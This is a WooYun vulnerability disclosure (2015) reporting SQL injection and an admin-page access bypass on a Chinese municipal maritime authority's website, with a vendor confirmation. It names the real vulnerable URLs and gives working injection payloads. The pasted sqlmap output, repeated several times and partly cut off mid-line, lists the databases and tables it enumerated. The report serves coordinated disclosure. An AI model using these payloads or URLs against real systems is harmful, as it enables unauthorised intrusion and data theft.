当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120985

漏洞标题:安徽省蚌埠市海事局存在SQL注射+绕过权限进后台

相关厂商:cncert国家互联网应急中心

漏洞作者: Mr_Sun

提交时间:2015-06-17 12:13

修复时间:2015-08-06 09:32

公开时间:2015-08-06 09:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-17: 细节已通知厂商并且等待厂商处理中
2015-06-22: 厂商已经确认,细节仅向厂商公开
2015-07-02: 细节向核心白帽子及相关领域专家公开
2015-07-12: 细节向普通白帽子公开
2015-07-22: 细节向实习白帽子公开
2015-08-06: 细节向公众公开

简要描述:

安徽省蚌埠市海事局存在SQL注射+绕过权限进后台

详细说明:

首先说下绕过:
直接输入后台
http://www.bbmsa.gov.cn/admin/index.htm

1.png


然后我们来说注射:
http://www.bbmsa.gov.cn/ggfw/zthd.aspx?id=108 (GET)

1.png


漏洞证明:

sqlmap identified the following injection points with a total of 65 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=108 AND 5123=5123
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=108; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=108 WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 4.0.30128
back-end DBMS: Microsoft SQL Server 2005
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=108 AND 5123=5123
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=108; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=108 WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 4.0.30128
back-end DBMS: Microsoft SQL Server 2005
available databases [5]:
[*] bbhsj
[*] master
[*] model
[*] msdb
[*] tempdb
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=108 AND 5123=5123
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=108; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=108 WAITFOR DELAY '0:0:5'--
---
web server opsqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=108 AND 5123=5123
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=108; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=108 WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 4.0.30128
back-end DBMS: Microsoft SQL Server 2005
available databases [5]:
[*] bbhsj
[*] master
[*] model
[*] msdb
[*] tempdb
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=108 AND 5123=5123
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=108; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=108 WAITFOR DELAY '0:0:5'--
---
web server opsqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=108 AND 5123=5123
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=108; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=108 WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 4.0.30128
back-end DBMS: Microsoft SQL Server 2005
available databases [5]:
[*] bbhsj
[*] master
[*] model
[*] msdb
[*] tempdb
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=108 AND 5123=5123
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=108; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=108 WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 4.0.30128
back-end DBMS: Microsoft SQL Server 2005
available databases [5]:
[*] bbhsj
[*] master
[*] model
[*] msdb
[*] tempdb
Database: bbhsj
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.web_PublicServices | 2721 |
| dbo.web_GuestBook | 307 |
| dbo.web_Subject | 84 |
| dbo.web_SysRights | 23 |
| dbo.web_Manager | 21 |
| dbo.web_FellowLink | 9 |
| dbo.aspnet_SchemaVersions | 6 |
| dbo.web_PictureRotation | 6 |
| dbo.sjjlbiao | 4 |
| dbo.web_Customs | 4 |
| dbo.caozuoyuan | 3 |
| dbo.Contact | 1 |
| dbo.web_Reply | 1 |
| dbo.web_UnderlingUnits | 1 |
+--------------------------------------------------+---------+
Database: master
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| sys.messages | 76640 |
| sys.sysmessages | 76640 |
| sys.dm_os_memory_objects | 23586 |
| sys.dm_os_buffer_descriptors | 13476 |
| sys.syscolumns | 11273 |
| sys.all_parameters | 6761 |
| sys.system_parameters | 6761 |
| sys.dm_os_memory_cache_entries | 5443 |
| sys.syscacheobjects | 5388 |
| sys.trace_subclass_values | 4729 |
| sys.dm_exec_cached_plans | 4608 |
| sys.dm_exec_query_stats | 4457 |
| sys.all_columns | 4307 |
| sys.trace_event_bindings | 3965 |
| sys.system_columns | 3749 |
| sys.syscomments | 2796 |
| dbo.spt_values | 2346 |
| sys.dm_os_ring_buffers | 1919 |
| sys.all_objects | 1839 |
| sys.sysobjects | 1839 |
| sys.dm_os_virtual_address_dump | 1800 |
| sys.system_objects | 1773 |
| sys.database_permissions | 1679 |
| sys.syspermissions | 1678 |
| sys.sysprotects | 1676 |
| sys.all_sql_modules | 1623 |
| sys.system_sql_modules | 1621 |
| sys.system_internals_partition_columns | 693 |
| sys.dm_os_performance_counters | 644 |
| sys.sysperfinfo | 644 |
| sys.columns | 558 |
| sys.dm_exec_query_transformation_stats | 380 |
| sys.stats_columns | 291 |
| sys.all_views | 286 |
| sys.system_views | 286 |
| sys.index_columns | 219 |
| sys.sysindexkeys | 219 |
| sys.dm_os_wait_stats | 202 |
| sys.event_notification_event_types | 193 |
| sys.sysindexes | 173 |
| sys.trace_events | 171 |
| sys.stats | 167 |
| sys.dm_os_latch_stats | 138 |
| sys.dm_os_memory_clerks | 131 |
| sys.syscharsets | 114 |
| sys.allocation_units | 112 |
| sys.system_internals_allocation_units | 112 |
| sys.dm_db_partition_stats | 101 |
| sys.indexes | 101 |
| sys.partitions | 101 |
| sys.system_internals_partitions | 101 |
| sys.system_components_surface_area_configuration | 99 |
| sys.xml_schema_facets | 97 |
| sys.dm_os_memory_cache_clock_hands | 96 |
| sys.xml_schema_components | 93 |
| sys.dm_db_index_usage_stats | 88 |
| sys.dm_os_loaded_modules | 83 |
| sys.xml_schema_types | 77 |
| sys.objects | 66 |
| sys.trace_columns | 65 |
| sys.configurations | 63 |
| sys.sysconfigures | 63 |
| sys.syscurconfigs | 63 |
| INFORMATION_SCHEMA.COLUMNS | 50 |
| sys.fulltext_document_types | 50 |
| sys.dm_os_memory_cache_counters | 48 |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 44 |
| sys.dm_os_threads | 44 |
| sys.dm_exec_query_optimizer_info | 38 |
| sys.dm_os_memory_cache_hash_tables | 38 |
| sys.dm_os_worker_local_storage | 36 |
| sys.dm_os_workers | 36 |
| sys.dm_os_memory_pools | 34 |
| sys.syslanguages | 33 |
| sys.systypes | 27 |
| sys.types | 27 |
| sys.dm_db_session_space_usage | 24 |
| sys.dm_db_task_space_usage | 24 |
| sys.dm_os_tasks | 24 |
| sys.sysprocesses | 24 |
| sys.dm_exec_sessions | 23 |
| sys.securable_classes | 21 |
| sys.trace_categories | 21 |
| sys.dm_tran_active_transactions | 20 |
| sys.dm_tran_database_transactions | 20 |
| sys.dm_exec_requests | 19 |
| sys.server_principals | 19 |
| sys.fulltext_languages | 17 |
| sys.server_permissions | 17 |
| sys.xml_schema_component_placements | 17 |
| sys.database_principals | 16 |
| sys.sysusers | 16 |
| INFORMATION_SCHEMA.SCHEMATA | 14 |
| sys.schemas | 14 |
| sys.service_message_types | 14 |
| sys.xml_schema_attributes | 14 |
| sys.dm_os_stacks | 13 |
| sys.dm_os_waiting_tasks | 11 |
| sys.service_contract_message_usages | 11 |
| sys.master_files | 10 |
| sys.sysaltfiles | 10 |
| sys.syslogins | 10 |
| sys.crypt_properties | 8 |
| sys.dm_os_schedulers | 7 |
| INFORMATION_SCHEMA.TABLES | 6 |
| sys.service_contracts | 6 |
| sys.tables | 6 |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 |
| sys.certificates | 5 |
| sys.database_mirroring | 5 |
| sys.database_recovery_status | 5 |
| sys.databases | 5 |
| sys.endpoints | 5 |
| sys.server_role_members | 5 |
| sys.sysdatabases | 5 |
| sys.dm_db_missing_index_details | 4 |
| sys.dm_db_missing_index_group_stats | 4 |
| sys.dm_db_missing_index_groups | 4 |
| sys.dm_tran_locks | 4 |
| sys.syslockinfo | 4 |
| dbo.MSreplication_options | 3 |
| sys.dm_clr_properties | 3 |
| sys.dm_exec_connections | 3 |
| sys.dm_os_hosts | 3 |
| sys.identity_columns | 3 |
| sys.internal_tables | 3 |
| sys.login_token | 3 |
| sys.service_queue_usages | 3 |
| sys.service_queues | 3 |
| sys.services | 3 |
| sys.syssegments | 3 |
| sys.xml_schema_namespaces | 3 |
| INFORMATION_SCHEMA.ROUTINES | 2 |
| sys.database_files | 2 |
| sys.dm_broker_queue_monitors | 2 |
| sys.dm_exec_query_resource_semaphores | 2 |
| sys.dm_fts_memory_pools | 2 |
| sys.key_encryptions | 2 |
| sys.procedures | 2 |
| sys.service_contract_usages | 2 |
| sys.sql_modules | 2 |
| sys.sysfiles | 2 |
| sys.tcp_endpoints | 2 |
| dbo.spt_monitor | 1 |
| sys.data_spaces | 1 |
| sys.database_role_members | 1 |
| sys.default_constraints | 1 |
| sys.dm_db_file_space_usage | 1 |
| sys.dm_exec_background_job_queue_stats | 1 |
| sys.dm_os_sys_info | 1 |
| sys.dm_tran_current_transaction | 1 |
| sys.filegroups | 1 |
| sys.linked_logins | 1 |
| sys.routes | 1 |
| sys.servers | 1 |
| sys.sql_logins | 1 |
| sys.symmetric_keys | 1 |
| sys.sysconstraints | 1 |
| sys.sysfilegroups | 1 |
| sys.sysmembers | 1 |
| sys.sysoledbusers | 1 |
| sys.sysservers | 1 |
| sys.traces | 1 |
| sys.user_token | 1 |
| sys.via_endpoints | 1 |
| sys.xml_schema_collections | 1 |
| sys.xml_schema_model_groups | 1 |
| sys.xml_schema_wildcards | 1 |
+--------------------------------------------------+---------+
Database: msdb
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.MSdbms_datatype_mapping | 325 |
| dbo.sysdatatypemappings | 325 |
| dbo.MSdbms_map | 248 |
| dbo.MSdatatype_mappings | 174 |
| dbo.syssessions | 163 |
| dbo.MSdbms_datatype | 141 |
| dbo.syscategories | 21 |
| dbo.syssubsystems | 11 |
| dbo.MSdbms | 7 |
| dbo.sysmail_configuration | 7 |
| dbo.backupfile | 4 |
| dbo.sysdtscategories | 3 |
| dbo.backupfilegroup | 2 |
| dbo.backupmediafamily | 2 |
| dbo.backupmediaset | 2 |
| dbo.backupset | 2 |
| dbo.restorefile | 2 |
| dbo.sysdtspackagefolders90 | 2 |
| dbo.restorefilegroup | 1 |
| dbo.restorehistory | 1 |
| dbo.sysdbmaintplans | 1 |
| dbo.sysmail_servertype | 1 |
| dbo.sysoriginatingservers_view | 1 |
| dbo.systargetservers_view | 1 |
+--------------------------------------------------+---------+

1.png


修复方案:

版权声明:转载请注明来源 Mr_Sun@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-06-22 09:30

厂商回复:

cnvd确认并复现所述情况,转由cncert下发给安徽分中心,由其后续协调网站管理单位处置。按多个风险综合评分,rank 11

最新状态:

暂无


漏洞评价:

评论